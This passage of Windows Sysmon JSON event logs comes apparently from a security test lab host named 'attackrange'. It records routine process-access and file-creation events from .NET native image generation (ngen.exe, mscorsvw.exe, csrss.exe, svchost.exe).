08:06:32.694","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-0010F6000F00}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7773,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.694\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-0010F6000F00}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.694","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-0010F6000F00}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7774,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-0010F6000F00}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-0010F6000F00}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7775,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:33.287\r\nProcessGuid: {41C8662E-2288-5F25-0000-0010F6000F00}\r\nProcessId: 4956\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\135c-0\\System.DirectoryServices.AccountManagement.dll\r\nCreationUtcTime: 2020-08-01 08:06:33.287","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:33.287","ProcessGuid":"{41C8662E-2288-5F25-0000-0010F6000F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\135c-0\\System.DirectoryServices.AccountManagement.dll","CreationUtcTime":"2020-08-01 08:06:33.287","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7776,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.319\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-0010FA040F00}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.319","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-0010FA040F00}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7777,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.319\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-0010FA040F00}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.319","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-0010FA040F00}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7778,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-0010FA040F00}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-0010FA040F00}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7779,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.365\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-001032080F00}\r\nTargetProcessId: 2332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.365","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-001032080F00}","TargetProcessId":"2332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7780,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.365\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-001032080F00}\r\nTargetProcessId: 2332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.365","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-001032080F00}","TargetProcessId":"2332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7781,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-001032080F00}\r\nTargetProcessId: 2332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 